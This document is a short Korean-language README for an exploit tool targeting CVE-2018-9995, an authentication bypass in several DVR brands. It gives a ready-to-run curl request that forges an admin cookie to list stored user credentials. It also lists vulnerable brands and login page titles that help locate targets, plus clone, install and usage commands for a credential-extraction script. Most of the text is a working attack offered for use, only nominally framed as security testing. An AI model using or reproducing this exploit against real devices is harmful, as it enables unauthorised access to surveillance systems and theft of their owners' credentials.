
CVE-2018-9995에 대한 익스플로잇 도구로, 쿠키 우회를 통한 HTTP 요청으로 DVR 자격 증명을 추출하며, 보안 테스트를 위해 여러 취약한 DVR 브랜드를 대상으로 합니다.
[*] Exploit Title: "DVR 자격 증명 획득"
[*] CVE: CVE-2018-9995
[*] CVSS Base Score v3: 7.3 / 10
[*] CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
[*] Date: 09/04/2018
[*] Exploit Author: Fernandez Ezequiel ( twitter:@capitan_alfa )

$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
Novo
CeNova
QSee
Pulnix
XVR 5 in 1 (제목: "XVR Login")
Securus, - 보안. 절대 타협하지 않는다 !! -
Night OWL
DVR Login
HVR Login
MDVR Login



usr@pwn:~$ git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git
usr@pwn:~$ cd CVE-2018-9995_dvr_credentials
usr@pwn:~$ pip install -r requirements.txt
usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]
[+] 노출된 자격 증명 획득
optional arguments:
-h, --help 도움말 메시지 표시 후 종료
-v, --version 프로그램 버전 번호 표시 후 종료
--host HOST 호스트
--port PORT 포트
[+] 데모: python getDVR_Credentials.py --host 192.168.1.101 -p 81

http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html
보인다... ! ㅋㅋ